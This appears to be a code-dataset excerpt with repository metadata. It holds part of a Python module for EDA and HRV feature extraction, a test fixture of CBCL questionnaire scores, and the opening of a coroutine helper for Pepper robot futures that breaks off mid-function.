frame_skip : float
Window stride for data in seconds
time_key : str, optional
Optional time key to include for a time axis in the new dataframe.
Default to 'Time (s)'. The time is assumed to start at 0 and
is inferred from the sampling rate
Returns
-------
df : Pandas dataframe
Windowed EDA features
"""
# TODO: Not sure if we should window the samples, then extract
# or extract, then window samples. My guess is it doesn't matter!
order = 4
w0 = 1.5 # Cutoff frequency for Butterworth (should I remove?)
w0 = 2 * np.array(w0) / sr
signal = nk.signal_sanitize(signal)
b, a = scipy.signal.butter(N=order, Wn=w0, btype='lowpass', analog=False, output='ba')
filtered = scipy.signal.filtfilt(b, a, signal)
signal_clean = nk.signal_smooth(filtered, method='convolution', kernel='blackman', size=48)
signal_decomp = nk.eda_phasic(signal_clean, sampling_rate=sr)
signal_peak, info = nk.eda_peaks(
signal_decomp['EDA_Phasic'].values,
sampling_rate=sr,
method='biosppy',
amplitude_min=0.1
)
# Only window nonzero amplitudes
df = pd.DataFrame({
'SCL': preprocessing.window_timed_array(times, signal_decomp['EDA_Tonic'].to_numpy(), frame_length, frame_skip),
'SCR_Amplitude': preprocessing.window_timed_array(times, signal_peak['SCR_Amplitude'].to_numpy(), frame_length, frame_skip, lambda x: np.mean(x[np.nonzero(x)]) if len(np.nonzero(x)[0]) > 0 else 0),
'SCR_Onsets': preprocessing.window_timed_array(times, signal_peak['SCR_Onsets'].to_numpy(), frame_length, frame_skip, lambda x: np.sum(x)),
'SCR_Peaks': preprocessing.window_timed_array(times, signal_peak['SCR_Peaks'].to_numpy(), frame_length, frame_skip, lambda x: np.sum(x)),
}) # Meh, recoverytime isn't really useful
start_times = np.arange(0.0, (frame_skip*(len(df.index))), frame_skip)
end_times = np.arange(frame_length, (frame_skip*(len(df.index)))+frame_length, frame_skip)
df['t0'] = start_times
df['tn'] = end_times
# Just to be safe..
df = df.sort_values(by=['t0']).reset_index(drop=True)
return df
def get_HRV_features(signal, sr, frame_length, frame_skip, times):
"""Extract HRV time-series features using BVP (PPG) or ECG data.
Extraction is done in a similar way as ComParE16.
# TODO: We could also just use IBI instead of finding peaks?
Parameters
----------
signal : ndarray
Array of BVP (PPG) or ECG data
sr : int
Sampling rate of BVP or ECG data
times : ndarray
Timestamps of each BVP/ECG sample TODO: Allow this to be inferred from sr
frame_length : float
Windowing length for data in seconds
frame_skip : float
Window stride for data in seconds
time_key : str, optional
Optional time key to include for a time axis in the new dataframe.
Default to 'Time (s)'. The time is assumed to start at 0 and
is inferred from the sampling rate
"""
# Unfortunately, we can't get good enough time series data unless
# BVP is at least 4 seconds in duration
assert frame_length >= 4.0 or math.isclose(frame_length, 4.0)
time_slices = preprocessing.get_window_slices(times, frame_length, frame_skip)
n_slices = len(time_slices)
feature_dfs = [None for _ in range(n_slices)]
for i in range(n_slices):
frame = signal[time_slices[i][0]:time_slices[i][1]+1]
frame_clean = nk.ppg_clean(frame, sampling_rate=sr)
info = nk.ppg_findpeaks(frame_clean, sampling_rate=sr)
if frame_length >= 30.0 or math.isclose(frame_length, 30.0): # Minimum required window for accurate freq + nonlinear features
feature_df = nk.hrv(info['PPG_Peaks'], sampling_rate=sr)
else:
feature_df = nk.hrv_time(info['PPG_Peaks'], sampling_rate=sr)
feature_df['t0'] = [i*frame_skip]
feature_df['tn'] = [(i*frame_skip)+frame_length]
feature_dfs[i] = feature_df
df = pd.concat(feature_dfs, axis=0)
df = df.sort_values(by=['t0']).reset_index(drop=True)
return df
| 0 | 0 | 0 |
185cabd14b5307ae851f8675295403e744d37ad0 | 12,203 | py | Python | backend/tests/internal/data/cbcl_6_18_scores.py | mkokotovich/cbcl_scoring | 86d8f636a980bce45fcf5fc7eccac5dffddfd3b8 | [
"MIT"
] | null | null | null | backend/tests/internal/data/cbcl_6_18_scores.py | mkokotovich/cbcl_scoring | 86d8f636a980bce45fcf5fc7eccac5dffddfd3b8 | [
"MIT"
] | 17 | 2019-12-26T16:45:10.000Z | 2022-03-21T22:16:37.000Z | backend/tests/internal/data/cbcl_6_18_scores.py | mkokotovich/testscoring | bc176caf37a2980d85a722efa919f416c9758a0e | [
"MIT"
] | null | null | null | scores = {"scores": [{"group": "I", "score": 7.0}, {"group": "II", "score": 5.0}, {"group": "III", "score": 2.0}, {"group": "IV", "score": 8.0}, {"group": "V", "score": 9.0}, {"group": "VI", "score": 16.0}, {"group": "VII", "score": 5.0}, {"group": "VIII", "score": 11.0}, {"group": "other", "score": 10.0}, {"group": "a", "score": 14.0}, {"group": "b", "score": 16.0}, {"group": "c", "score": 43.0}, {"group": "total", "score": 73.0}], "test": {"id": 9, "items": [{"id": 356, "number": "1", "description": "", "score": "2", "group": "VI", "groups": ["VI"]}, {"id": 357, "number": "2", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 358, "number": "3", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 359, "number": "4", "description": "", "score": "2", "group": "VI", "groups": ["VI"]}, {"id": 360, "number": "5", "description": "", "score": "0", "group": "II", "groups": ["II"]}, {"id": 361, "number": "6", "description": "", "score": "0", "group": "other", "groups": ["other"]}, {"id": 362, "number": "7", "description": "", "score": "0", "group": "other", "groups": ["other"]}, {"id": 363, "number": "8", "description": "", "score": "2", "group": "VI", "groups": ["VI"]}, {"id": 364, "number": "9", "description": "", "score": "2", "group": "V", "groups": ["V"]}, {"id": 365, "number": "10", "description": "", "score": "2", "group": "VI", "groups": ["VI"]}, {"id": 366, "number": "11", "description": "", "score": "1", "group": "IV", "groups": ["IV"]}, {"id": 367, "number": "12", "description": "", "score": "0", "group": "IV", "groups": ["IV"]}, {"id": 368, "number": "13", "description": "", "score": "1", "group": "VI", "groups": ["VI"]}, {"id": 369, "number": "14", "description": "", "score": "1", "group": "I", "groups": ["I"]}, {"id": 370, "number": "15", "description": "", "score": "1", "group": "other", "groups": ["other"]}, {"id": 371, "number": "16", "description": "", "score": "1", "group": 
"VIII", "groups": ["VIII"]}, {"id": 372, "number": "17", "description": "", "score": "0", "group": "VI", "groups": ["VI"]}, {"id": 373, "number": "18", "description": "", "score": "0", "group": "V", "groups": ["V"]}, {"id": 374, "number": "19", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 375, "number": "20", "description": "", "score": "0", "group": "VIII", "groups": ["VIII"]}, {"id": 376, "number": "21", "description": "", "score": "0", "group": "VIII", "groups": ["VIII"]}, {"id": 377, "number": "22", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 378, "number": "23", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 379, "number": "24", "description": "", "score": "0", "group": "other", "groups": ["other"]}, {"id": 380, "number": "25", "description": "", "score": "0", "group": "IV", "groups": ["IV"]}, {"id": 381, "number": "26", "description": "", "score": "1", "group": "VII", "groups": ["VII"]}, {"id": 382, "number": "27", "description": "", "score": "1", "group": "IV", "groups": ["IV"]}, {"id": 383, "number": "28", "description": "", "score": "2", "group": "VII", "groups": ["VII"]}, {"id": 384, "number": "29", "description": "", "score": "0", "group": "I", "groups": ["I"]}, {"id": 385, "number": "30", "description": "", "score": "0", "group": "I", "groups": ["I"]}, {"id": 386, "number": "31", "description": "", "score": "0", "group": "I", "groups": ["I"]}, {"id": 387, "number": "32", "description": "", "score": "0", "group": "I", "groups": ["I"]}, {"id": 388, "number": "33", "description": "", "score": "0", "group": "I", "groups": ["I"]}, {"id": 389, "number": "34", "description": "", "score": "0", "group": "IV", "groups": ["IV"]}, {"id": 390, "number": "35", "description": "", "score": "0", "group": "I", "groups": ["I"]}, {"id": 391, "number": "36", "description": "", "score": "1", "group": "IV", "groups": ["IV"]}, {"id": 392, "number": "37", "description": "", 
"score": "0", "group": "VIII", "groups": ["VIII"]}, {"id": 393, "number": "38", "description": "", "score": "0", "group": "IV", "groups": ["IV"]}, {"id": 394, "number": "39", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 395, "number": "40", "description": "", "score": "0", "group": "V", "groups": ["V"]}, {"id": 396, "number": "41", "description": "", "score": "2", "group": "VI", "groups": ["VI"]}, {"id": 397, "number": "42", "description": "", "score": "0", "group": "II", "groups": ["II"]}, {"id": 398, "number": "43", "description": "", "score": "1", "group": "VII", "groups": ["VII"]}, {"id": 399, "number": "44", "description": "", "score": "2", "group": "other", "groups": ["other"]}, {"id": 400, "number": "45", "description": "", "score": "2", "group": "I", "groups": ["I"]}, {"id": 401, "number": "46", "description": "", "score": "0", "group": "V", "groups": ["V"]}, {"id": 402, "number": "47", "description": "", "score": "1", "group": "III", "groups": ["III"]}, {"id": 403, "number": "48", "description": "", "score": "0", "group": "IV", "groups": ["IV"]}, {"id": 404, "number": "49", "description": "", "score": "0", "group": "III", "groups": ["III"]}, {"id": 405, "number": "50", "description": "", "score": "2", "group": "I", "groups": ["I"]}, {"id": 406, "number": "51", "description": "", "score": "0", "group": "III", "groups": ["III"]}, {"id": 407, "number": "52", "description": "", "score": "0", "group": "I", "groups": ["I"]}, {"id": 408, "number": "53", "description": "", "score": "2", "group": "other", "groups": ["other"]}, {"id": 409, "number": "54", "description": "", "score": "1", "group": "III", "groups": ["III"]}, {"id": 410, "number": "55", "description": "", "score": "2", "group": "other", "groups": ["other"]}, {"id": 411, "number": "56a", "description": "", "score": "0", "group": "III", "groups": ["III"]}, {"id": 412, "number": "56b", "description": "", "score": "0", "group": "III", "groups": ["III"]}, {"id": 413, "number": 
"56c", "description": "", "score": "0", "group": "III", "groups": ["III"]}, {"id": 414, "number": "56d", "description": "", "score": "0", "group": "III", "groups": ["III"]}, {"id": 415, "number": "56e", "description": "", "score": "0", "group": "III", "groups": ["III"]}, {"id": 416, "number": "56f", "description": "", "score": "0", "group": "III", "groups": ["III"]}, {"id": 417, "number": "56g", "description": "", "score": "0", "group": "III", "groups": ["III"]}, {"id": 418, "number": "56h", "description": "", "score": "0", "group": "other", "groups": ["other"]}, {"id": 419, "number": "57", "description": "", "score": "0", "group": "VIII", "groups": ["VIII"]}, {"id": 420, "number": "58", "description": "", "score": "1", "group": "V", "groups": ["V"]}, {"id": 421, "number": "59", "description": "", "score": "0", "group": "V", "groups": ["V"]}, {"id": 422, "number": "60", "description": "", "score": "0", "group": "V", "groups": ["V"]}, {"id": 423, "number": "61", "description": "", "score": "2", "group": "VI", "groups": ["VI"]}, {"id": 424, "number": "62", "description": "", "score": "2", "group": "IV", "groups": ["IV"]}, {"id": 425, "number": "63", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 426, "number": "64", "description": "", "score": "2", "group": "IV", "groups": ["IV"]}, {"id": 427, "number": "65", "description": "", "score": "1", "group": "II", "groups": ["II"]}, {"id": 428, "number": "66", "description": "", "score": "1", "group": "V", "groups": ["V"]}, {"id": 429, "number": "67", "description": "", "score": "1", "group": "VII", "groups": ["VII"]}, {"id": 430, "number": "68", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 431, "number": "69", "description": "", "score": "1", "group": "II", "groups": ["II"]}, {"id": 432, "number": "70", "description": "", "score": "0", "group": "V", "groups": ["V"]}, {"id": 433, "number": "71", "description": "", "score": "0", "group": "I", "groups": ["I"]}, 
{"id": 434, "number": "72", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 435, "number": "73", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 436, "number": "74", "description": "", "score": "1", "group": "other", "groups": ["other"]}, {"id": 437, "number": "75", "description": "", "score": "1", "group": "II", "groups": ["II"]}, {"id": 438, "number": "76", "description": "", "score": "0", "group": "V", "groups": ["V"]}, {"id": 439, "number": "77", "description": "", "score": "0", "group": "other", "groups": ["other"]}, {"id": 440, "number": "78", "description": "", "score": "2", "group": "VI", "groups": ["VI"]}, {"id": 441, "number": "79", "description": "", "score": "1", "group": "IV", "groups": ["IV"]}, {"id": 442, "number": "80", "description": "", "score": "1", "group": "VI", "groups": ["VI"]}, {"id": 443, "number": "81", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 444, "number": "82", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 445, "number": "83", "description": "", "score": "0", "group": "V", "groups": ["V"]}, {"id": 446, "number": "84", "description": "", "score": "1", "group": "V", "groups": ["V"]}, {"id": 447, "number": "85", "description": "", "score": "1", "group": "V", "groups": ["V"]}, {"id": 448, "number": "86", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 449, "number": "87", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 450, "number": "88", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 451, "number": "89", "description": "", "score": "0", "group": "VIII", "groups": ["VIII"]}, {"id": 452, "number": "90", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 453, "number": "91", "description": "", "score": "0", "group": "I", "groups": ["I"]}, {"id": 454, "number": "92", "description": "", "score": "1", "group": 
"V", "groups": ["V"]}, {"id": 455, "number": "93", "description": "", "score": "1", "group": "other", "groups": ["other"]}, {"id": 456, "number": "94", "description": "", "score": "0", "group": "VIII", "groups": ["VIII"]}, {"id": 457, "number": "95", "description": "", "score": "0", "group": "VIII", "groups": ["VIII"]}, {"id": 458, "number": "96", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 459, "number": "97", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 460, "number": "98", "description": "", "score": "0", "group": "other", "groups": ["other"]}, {"id": 461, "number": "99", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 462, "number": "100", "description": "", "score": "2", "group": "V", "groups": ["V"]}, {"id": 463, "number": "101", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 464, "number": "102", "description": "", "score": "1", "group": "II", "groups": ["II"]}, {"id": 465, "number": "103", "description": "", "score": "1", "group": "II", "groups": ["II"]}, {"id": 466, "number": "104", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 467, "number": "105", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 468, "number": "106", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 469, "number": "107", "description": "", "score": "0", "group": "other", "groups": ["other"]}, {"id": 470, "number": "108", "description": "", "score": "0", "group": "other", "groups": ["other"]}, {"id": 471, "number": "109", "description": "", "score": "1", "group": "other", "groups": ["other"]}, {"id": 472, "number": "110", "description": "", "score": "0", "group": "other", "groups": ["other"]}, {"id": 473, "number": "111", "description": "", "score": "0", "group": "II", "groups": ["II"]}, {"id": 474, "number": "112", "description": "", "score": "2", "group": "I", "groups": ["I"]}, 
{"id": 475, "number": "113", "description": "", "score": "0", "group": "other", "groups": ["other"]}], "created_at": "2018-08-25T01:09:48.166593Z", "updated_at": "2018-08-25T01:09:48.166648Z", "client_number": "1", "test_type": "cbcl_6_18", "owner": 3}} | 12,203 | 12,203 | 0.484061 | scores = {"scores": [{"group": "I", "score": 7.0}, {"group": "II", "score": 5.0}, {"group": "III", "score": 2.0}, {"group": "IV", "score": 8.0}, {"group": "V", "score": 9.0}, {"group": "VI", "score": 16.0}, {"group": "VII", "score": 5.0}, {"group": "VIII", "score": 11.0}, {"group": "other", "score": 10.0}, {"group": "a", "score": 14.0}, {"group": "b", "score": 16.0}, {"group": "c", "score": 43.0}, {"group": "total", "score": 73.0}], "test": {"id": 9, "items": [{"id": 356, "number": "1", "description": "", "score": "2", "group": "VI", "groups": ["VI"]}, {"id": 357, "number": "2", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 358, "number": "3", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 359, "number": "4", "description": "", "score": "2", "group": "VI", "groups": ["VI"]}, {"id": 360, "number": "5", "description": "", "score": "0", "group": "II", "groups": ["II"]}, {"id": 361, "number": "6", "description": "", "score": "0", "group": "other", "groups": ["other"]}, {"id": 362, "number": "7", "description": "", "score": "0", "group": "other", "groups": ["other"]}, {"id": 363, "number": "8", "description": "", "score": "2", "group": "VI", "groups": ["VI"]}, {"id": 364, "number": "9", "description": "", "score": "2", "group": "V", "groups": ["V"]}, {"id": 365, "number": "10", "description": "", "score": "2", "group": "VI", "groups": ["VI"]}, {"id": 366, "number": "11", "description": "", "score": "1", "group": "IV", "groups": ["IV"]}, {"id": 367, "number": "12", "description": "", "score": "0", "group": "IV", "groups": ["IV"]}, {"id": 368, "number": "13", "description": "", "score": "1", "group": "VI", "groups": ["VI"]}, {"id": 
369, "number": "14", "description": "", "score": "1", "group": "I", "groups": ["I"]}, {"id": 370, "number": "15", "description": "", "score": "1", "group": "other", "groups": ["other"]}, {"id": 371, "number": "16", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 372, "number": "17", "description": "", "score": "0", "group": "VI", "groups": ["VI"]}, {"id": 373, "number": "18", "description": "", "score": "0", "group": "V", "groups": ["V"]}, {"id": 374, "number": "19", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 375, "number": "20", "description": "", "score": "0", "group": "VIII", "groups": ["VIII"]}, {"id": 376, "number": "21", "description": "", "score": "0", "group": "VIII", "groups": ["VIII"]}, {"id": 377, "number": "22", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 378, "number": "23", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 379, "number": "24", "description": "", "score": "0", "group": "other", "groups": ["other"]}, {"id": 380, "number": "25", "description": "", "score": "0", "group": "IV", "groups": ["IV"]}, {"id": 381, "number": "26", "description": "", "score": "1", "group": "VII", "groups": ["VII"]}, {"id": 382, "number": "27", "description": "", "score": "1", "group": "IV", "groups": ["IV"]}, {"id": 383, "number": "28", "description": "", "score": "2", "group": "VII", "groups": ["VII"]}, {"id": 384, "number": "29", "description": "", "score": "0", "group": "I", "groups": ["I"]}, {"id": 385, "number": "30", "description": "", "score": "0", "group": "I", "groups": ["I"]}, {"id": 386, "number": "31", "description": "", "score": "0", "group": "I", "groups": ["I"]}, {"id": 387, "number": "32", "description": "", "score": "0", "group": "I", "groups": ["I"]}, {"id": 388, "number": "33", "description": "", "score": "0", "group": "I", "groups": ["I"]}, {"id": 389, "number": "34", "description": "", "score": "0", "group": "IV", 
"groups": ["IV"]}, {"id": 390, "number": "35", "description": "", "score": "0", "group": "I", "groups": ["I"]}, {"id": 391, "number": "36", "description": "", "score": "1", "group": "IV", "groups": ["IV"]}, {"id": 392, "number": "37", "description": "", "score": "0", "group": "VIII", "groups": ["VIII"]}, {"id": 393, "number": "38", "description": "", "score": "0", "group": "IV", "groups": ["IV"]}, {"id": 394, "number": "39", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 395, "number": "40", "description": "", "score": "0", "group": "V", "groups": ["V"]}, {"id": 396, "number": "41", "description": "", "score": "2", "group": "VI", "groups": ["VI"]}, {"id": 397, "number": "42", "description": "", "score": "0", "group": "II", "groups": ["II"]}, {"id": 398, "number": "43", "description": "", "score": "1", "group": "VII", "groups": ["VII"]}, {"id": 399, "number": "44", "description": "", "score": "2", "group": "other", "groups": ["other"]}, {"id": 400, "number": "45", "description": "", "score": "2", "group": "I", "groups": ["I"]}, {"id": 401, "number": "46", "description": "", "score": "0", "group": "V", "groups": ["V"]}, {"id": 402, "number": "47", "description": "", "score": "1", "group": "III", "groups": ["III"]}, {"id": 403, "number": "48", "description": "", "score": "0", "group": "IV", "groups": ["IV"]}, {"id": 404, "number": "49", "description": "", "score": "0", "group": "III", "groups": ["III"]}, {"id": 405, "number": "50", "description": "", "score": "2", "group": "I", "groups": ["I"]}, {"id": 406, "number": "51", "description": "", "score": "0", "group": "III", "groups": ["III"]}, {"id": 407, "number": "52", "description": "", "score": "0", "group": "I", "groups": ["I"]}, {"id": 408, "number": "53", "description": "", "score": "2", "group": "other", "groups": ["other"]}, {"id": 409, "number": "54", "description": "", "score": "1", "group": "III", "groups": ["III"]}, {"id": 410, "number": "55", "description": "", "score": "2", 
"group": "other", "groups": ["other"]}, {"id": 411, "number": "56a", "description": "", "score": "0", "group": "III", "groups": ["III"]}, {"id": 412, "number": "56b", "description": "", "score": "0", "group": "III", "groups": ["III"]}, {"id": 413, "number": "56c", "description": "", "score": "0", "group": "III", "groups": ["III"]}, {"id": 414, "number": "56d", "description": "", "score": "0", "group": "III", "groups": ["III"]}, {"id": 415, "number": "56e", "description": "", "score": "0", "group": "III", "groups": ["III"]}, {"id": 416, "number": "56f", "description": "", "score": "0", "group": "III", "groups": ["III"]}, {"id": 417, "number": "56g", "description": "", "score": "0", "group": "III", "groups": ["III"]}, {"id": 418, "number": "56h", "description": "", "score": "0", "group": "other", "groups": ["other"]}, {"id": 419, "number": "57", "description": "", "score": "0", "group": "VIII", "groups": ["VIII"]}, {"id": 420, "number": "58", "description": "", "score": "1", "group": "V", "groups": ["V"]}, {"id": 421, "number": "59", "description": "", "score": "0", "group": "V", "groups": ["V"]}, {"id": 422, "number": "60", "description": "", "score": "0", "group": "V", "groups": ["V"]}, {"id": 423, "number": "61", "description": "", "score": "2", "group": "VI", "groups": ["VI"]}, {"id": 424, "number": "62", "description": "", "score": "2", "group": "IV", "groups": ["IV"]}, {"id": 425, "number": "63", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 426, "number": "64", "description": "", "score": "2", "group": "IV", "groups": ["IV"]}, {"id": 427, "number": "65", "description": "", "score": "1", "group": "II", "groups": ["II"]}, {"id": 428, "number": "66", "description": "", "score": "1", "group": "V", "groups": ["V"]}, {"id": 429, "number": "67", "description": "", "score": "1", "group": "VII", "groups": ["VII"]}, {"id": 430, "number": "68", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 431, "number": "69", 
"description": "", "score": "1", "group": "II", "groups": ["II"]}, {"id": 432, "number": "70", "description": "", "score": "0", "group": "V", "groups": ["V"]}, {"id": 433, "number": "71", "description": "", "score": "0", "group": "I", "groups": ["I"]}, {"id": 434, "number": "72", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 435, "number": "73", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 436, "number": "74", "description": "", "score": "1", "group": "other", "groups": ["other"]}, {"id": 437, "number": "75", "description": "", "score": "1", "group": "II", "groups": ["II"]}, {"id": 438, "number": "76", "description": "", "score": "0", "group": "V", "groups": ["V"]}, {"id": 439, "number": "77", "description": "", "score": "0", "group": "other", "groups": ["other"]}, {"id": 440, "number": "78", "description": "", "score": "2", "group": "VI", "groups": ["VI"]}, {"id": 441, "number": "79", "description": "", "score": "1", "group": "IV", "groups": ["IV"]}, {"id": 442, "number": "80", "description": "", "score": "1", "group": "VI", "groups": ["VI"]}, {"id": 443, "number": "81", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 444, "number": "82", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 445, "number": "83", "description": "", "score": "0", "group": "V", "groups": ["V"]}, {"id": 446, "number": "84", "description": "", "score": "1", "group": "V", "groups": ["V"]}, {"id": 447, "number": "85", "description": "", "score": "1", "group": "V", "groups": ["V"]}, {"id": 448, "number": "86", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 449, "number": "87", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 450, "number": "88", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 451, "number": "89", "description": "", "score": "0", "group": "VIII", "groups": ["VIII"]}, {"id": 
452, "number": "90", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 453, "number": "91", "description": "", "score": "0", "group": "I", "groups": ["I"]}, {"id": 454, "number": "92", "description": "", "score": "1", "group": "V", "groups": ["V"]}, {"id": 455, "number": "93", "description": "", "score": "1", "group": "other", "groups": ["other"]}, {"id": 456, "number": "94", "description": "", "score": "0", "group": "VIII", "groups": ["VIII"]}, {"id": 457, "number": "95", "description": "", "score": "0", "group": "VIII", "groups": ["VIII"]}, {"id": 458, "number": "96", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 459, "number": "97", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 460, "number": "98", "description": "", "score": "0", "group": "other", "groups": ["other"]}, {"id": 461, "number": "99", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 462, "number": "100", "description": "", "score": "2", "group": "V", "groups": ["V"]}, {"id": 463, "number": "101", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 464, "number": "102", "description": "", "score": "1", "group": "II", "groups": ["II"]}, {"id": 465, "number": "103", "description": "", "score": "1", "group": "II", "groups": ["II"]}, {"id": 466, "number": "104", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 467, "number": "105", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 468, "number": "106", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 469, "number": "107", "description": "", "score": "0", "group": "other", "groups": ["other"]}, {"id": 470, "number": "108", "description": "", "score": "0", "group": "other", "groups": ["other"]}, {"id": 471, "number": "109", "description": "", "score": "1", "group": "other", "groups": ["other"]}, {"id": 472, "number": "110", "description": 
"", "score": "0", "group": "other", "groups": ["other"]}, {"id": 473, "number": "111", "description": "", "score": "0", "group": "II", "groups": ["II"]}, {"id": 474, "number": "112", "description": "", "score": "2", "group": "I", "groups": ["I"]}, {"id": 475, "number": "113", "description": "", "score": "0", "group": "other", "groups": ["other"]}], "created_at": "2018-08-25T01:09:48.166593Z", "updated_at": "2018-08-25T01:09:48.166648Z", "client_number": "1", "test_type": "cbcl_6_18", "owner": 3}} | 0 | 0 | 0 |
c79dc8d37779a70e8545847151e617acfa37acba | 9,267 | py | Python | app/scripts/dxhomefinder/stk/coroutines.py | softbankrobotics-labs/pepper-proactive-mobility | a9f6132ee5afd9bb6583741d9d4c481bd9597c65 | [
"BSD-3-Clause"
] | 5 | 2020-01-16T22:50:31.000Z | 2021-07-19T19:16:48.000Z | app/scripts/dxhomefinder/stk/coroutines.py | softbankrobotics-labs/pepper-proactive-mobility | a9f6132ee5afd9bb6583741d9d4c481bd9597c65 | [
"BSD-3-Clause"
] | 1 | 2021-06-18T17:45:55.000Z | 2021-06-18T17:45:55.000Z | app/scripts/dxhomefinder/stk/coroutines.py | softbankrobotics-labs/pepper-proactive-mobility | a9f6132ee5afd9bb6583741d9d4c481bd9597c65 | [
"BSD-3-Clause"
] | null | null | null | """
Helper for easily doing async tasks with coroutines.
It's mostly syntactic sugar that removes the need for .then and .andThen.
Simply:
- make a generator function that yields futures (e.g. from qi.async)
- add the decorator async_generator
For example:
@stk.coroutines.async_generator
def run_test(self):
yield ALTextToSpeech.say("ready", _async=True)
yield ALTextToSpeech.say("steady", _async=True)
time.sleep(1)
yield ALTextToSpeech.say("go", _async=True)
... this will turn run_test into a function that returns a future that is
valid when the call is done - and that is still cancelable (your robot will
start speaking).
As your function now returns a future, it can be used in "yield run_test()" in
another function wrapped with this decorator.
"""
__version__ = "0.1.2"
__copyright__ = "Copyright 2017, Aldebaran Robotics / Softbank Robotics Europe"
__author__ = 'ekroeger'
__email__ = 'ekroeger@softbankrobotics.com'
import functools
import time
import threading
import qi
class _MultiFuture(object):
"""Internal helper for handling lists of futures.
The callback will only be called once, with either an exception or a
list of the right type and size.
"""
def __handle_part_done(self, index, future):
"Internal callback for when a sub-function is done."
if self.failed:
# We already raised an exception, don't do anything else.
return
assert self.expecting, "Got more callbacks than expected!"
try:
self.values[index] = future.value()
except Exception as exception:
self.failed = True
self.callback(exception=exception)
return
self.expecting -= 1
if not self.expecting:
# We have all the values
self.callback(self.returntype(self.values))
class FutureWrapper(object):
"Abstract base class for objects that pretend to be a future."
def then(self, callback):
"""Add function to be called when the future is done; returns a future.
The callback will be called with a (finished) future.
"""
if self.running: # We might want a mutex here...
return self.future.then(callback)
else:
callback(self)
# return something? (to see when we have a testcase for this...)
def andThen(self, callback):
"""Add function to be called when the future is done; returns a future.
The callback will be called with a return value (for now, None).
"""
if self.running: # We might want a mutex here...
return self.future.andThen(callback)
else:
callback(self.future.value()) #?
# return something? (to see when we have a testcase for this...)
def hasError(self):
"Was there an error in one of the generator calls?"
return bool(self._exception)
def wait(self):
"Blocks the thread until everything is finished."
self.future.wait()
def isRunning(self):
"Is the sequence of generators still running?"
return self.future.isRunning()
def value(self):
"""Blocks the thread, and returns the final generator return value.
For now, always returns None."""
if self._exception:
raise self._exception
else:
return self.future.value()
def hasValue(self):
"Tells us whether the generator 1) is finished and 2) has a value."
# For some reason this doesn't do what I expected
# self.future.hasValue() returns True even if we're not finished (?)
if self.running:
return False
elif self._exception:
return False
else:
return self.future.hasValue()
def isFinished(self):
"Is the generator finished?"
return self.future.isFinished()
def error(self):
"Returns the error of the future."
return self.future.error()
def isCancelable(self):
"Is this future cancelable? Yes, it always is."
return True
def cancel(self):
"Cancel the future, and stop executing the sequence of actions."
with self.lock:
self.running = False
self.promise.setCanceled()
def isCanceled(self):
"Has this already been cancelled?"
return not self.running
def addCallback(self, callback):
"Add function to be called when the future is done."
self.then(callback)
# You know what? I'm not implementing unwrap() because I don't see a
# use case.
class GeneratorFuture(FutureWrapper):
"Future-like object (same interface) made for wrapping a generator."
def __handle_done(self, future):
"Internal callback for when the current sub-function is done."
try:
self.__ask_for_next(future.value())
except Exception as exception:
self.__ask_for_next(exception=exception)
def __finish(self, value):
"Finish and return."
with self.lock:
self.running = False
self.promise.setValue(value)
def __ask_for_next(self, arg=None, exception=None):
"Internal - get the next function in the generator."
if self.running:
try:
self.sub_future = None # TODO: handle multifuture
if exception:
future = self.generator.throw(exception)
else:
future = self.generator.send(arg)
if isinstance(future, list):
self.sub_future = _MultiFuture(future, self.__ask_for_next, list)
elif isinstance(future, tuple):
